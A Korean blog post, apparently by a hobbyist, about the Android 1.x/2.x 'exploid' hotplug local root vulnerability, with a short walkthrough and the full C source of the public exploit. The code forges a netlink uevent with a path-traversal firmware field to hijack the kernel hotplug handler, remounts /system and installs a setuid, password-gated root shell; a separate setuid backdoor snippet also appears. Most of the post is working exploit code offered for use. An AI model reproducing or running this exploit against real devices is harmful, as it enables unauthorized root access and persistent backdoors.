with silverbug :: Android 1.x/2.x hotplug invoke 취약점. Exploit... Rooting 루팅..

Android 1.x/2.x the real youdev feat. init local root exploit.

안드로이드 취약점이 발견됐습니다.

드디어 안드로이드 폰들에게 광명의 빛이.. ~~~ 올레!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

루팅의 공격 과정은 기존의 공격 방식과 좀 다릅니다.

기존의 공격 방식을 간단하게 설명하면....

- Firmware 수정을 통한 강제로 firmware 밀어 넣기.
- update.zip을 통한 루트 권한 획득.
- 커널 취약점.

이었습니다. 허나 이번 취약점은 안드로이드에서의 문제점인데요. (실제 폰에서만 동작하는... 가상의 애뮬레이터에서는 동작하지 않음)

자 초 간단 분석을 해 보도록 합시다.

--------------------------------------------------------------
이 분석 과정은 분석가 Silverbug의 지맘대로 분석으로 절대로 전문가적인 내용이 아님을 미리 밝혀드립니다.

자 그럼 공격자의 입장에서 어떤 식으로 공격이 가능한지 알아보자.

이 데이터를 소켓을 통해 강제로 보내면 된다. 내용은 아래처럼...
ACTION=add0DEVPATH=~~~~
SUBSYSTEM=firmware0~~
FIRMWARE=공격자가 지정한 hotplug 설정 파일(백도어)

/proc/sys/kernel/hotplug 에 공격자가 지정한 디렉터리의 exploid가 들어가게 되고.. 그 hotplug 실행.

그럼 root는 hotplug 파일을 공격자가 만든 hotplug 파일을 읽어들이게 되고..
hotplug 파일 안에는 hotplug의 경로가 아닌 공격자가 만든 백도어(트로잔)의 경로를 넣어두어 루트가 실행하도록 한다.

백도어는 대략 일반 리눅스에서처럼 아래의 코드처럼 작성하면 된다. (아래의 컴파일된 코드를 다른 곳으로 복사 또는 권한 변경)

char *sh[] = {"/system/bin/sh", 0};
setuid(0);
setgid(0);
execve(*sh, sh, env);

익스플로잇 코드는 root 권한으로 재마운트를 통해 rootshell을 카피하도록 하였다.

드디어 염원이던 모토로이도 루팅이 됐다. 하지만 모토로라 제품의 경우 RSA로 펌웨어를 체크하기 때문에 현재로서는 ... 사용자가 만든 펌웨어는 나올 수 가 없을 것이다. (2.2 프로요 업데이트는 업체에서 해줘야 ㅠㅠ 하는)

즉 루팅만 된다는..

아래의 URL을 통해 루팅 과정을 볼 수가 있다.
http://alldroid.org/default.aspx?g=posts&t=493

외국에 공개된 멋진 코드는 아래와 같다...

/* android 1.x/2.x the real youdev feat. init local root exploit.
* (C) 2009/2010 by The Android Exploid Crew.
*
* Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
* Or use /data/local/tmp if available (thx to ioerror!) It is important to
* to use /sqlite_stmt_journals directory if available.
* Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
* or use USB keys etc. This will invoke hotplug which is actually
* our exploit making /system/bin/rootshell.
* This exploit requires /etc/firmware directory, e.g. it will
* run on real devices and not inside the emulator.
* I'd like to have this exploitet by using the same blockdevice trick
* as in udev, but internal structures only allow world writable char
* devices, not block devices, so I used the firmware subsystem.
*
* !!!This is PoC code for educational purposes only!!!
* If you run it, it might crash your device and make it unusable!
* So you use it at your own risk!
*
* Thx to all the TAEC supporters.
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>

#define SECRET "secretlol"

void die(const char *msg)
{
perror(msg);
exit(errno);
}

void copy(const char *from, const char *to)
{
int fd1, fd2;
char buf[0x1000];
ssize_t r = 0;

if ((fd1 = open(from, O_RDONLY)) < 0)
  die("[-] open");
if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0)
  die("[-] open");
for (;;) {
  r = read(fd1, buf, sizeof(buf));
  if (r < 0)
   die("[-] read");
  if (r == 0)
   break;
  if (write(fd2, buf, r) != r)
   die("[-] write");
}

close(fd1);
close(fd2);
sync(); sync();
}

void clear_hotplug()
{
int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
write(ofd, "", 1);
close(ofd);
}

void rootshell(char **env)
{
char pwd[128];
char *sh[] = {"/system/bin/sh", 0};

memset(pwd, 0, sizeof(pwd));
readlink("/proc/self/fd/0", pwd, sizeof(pwd));
if (strncmp(pwd, "/dev/pts/", 9) != 0)
die("[-] memory tricks");

write(1, "Password (echoed):", 18);
memset(pwd, 0, sizeof(pwd));
read(0, pwd, sizeof(pwd) - 1);
sleep(2);

if (strlen(pwd) < 6)
die("[-] password too short");
if (memcmp(pwd, SECRET, strlen(SECRET)) != 0)
die("[-] wrong password");

setuid(0); setgid(0);
execve(*sh, sh, env);
die("[-] execve");
}

int main(int argc, char **argv, char **env)
{
char buf[512], path[512];
int ofd;
struct sockaddr_nl snl;
struct iovec iov = {buf, sizeof(buf)};
struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
int sock;
char *basedir = NULL;

/* I hope there is no LD_ bug in androids rtld :) */
if (geteuid() == 0 && getuid() != 0)
rootshell(env);

if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
die("[-] readlink");

if (geteuid() == 0) {
  clear_hotplug();
  /* remount /system rw */
  if (mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0) < 0)
   mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0);
  copy(path, "/system/bin/rootshell");
  chmod("/system/bin/rootshell", 04755);
  for (;;);
}

printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
printf("[*] Modified by birdman for the DroidX\n");

basedir = "/sqlite_stmt_journals";
if (chdir(basedir) < 0) {
  basedir = "/data/local/tmp";
  if (chdir(basedir) < 0)
   basedir = strdup(getcwd(buf, sizeof(buf)));
}
printf("[+] Using basedir=%s, path=%s\n", basedir, path);
printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

memset(&snl, 0, sizeof(snl));
snl.nl_pid = 1;
snl.nl_family = AF_NETLINK;

if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
die("[-] socket");

close(creat("loading", 0666));
if ((ofd = creat("hotplug", 0644)) < 0)
  die("[-] creat");
if (write(ofd, path , strlen(path)) < 0)
  die("[-] write");
close(ofd);
symlink("/proc/sys/kernel/hotplug", "data");
snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
          "SUBSYSTEM=firmware%c"
          "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
printf("[+] sending add message ...\n");
if (sendmsg(sock, &msg, 0) < 0)
  die("[-] sendmsg");
close(sock);
printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
        "[*] settings, plugin USB key etc.\n"
        "[*] You succeeded if you find /system/bin/rootshell.\n"
        "[*] GUI might hang/restart meanwhile so be patient.\n");
sleep(3);
return 0;
}

with silverbug

Android 1.x/2.x hotplug invoke 취약점. Exploit... Rooting 루팅..

Tag Cloud

Categories

Recent Posts

Recent Comments

Recent Trackbacks

Calendar

Bookmarks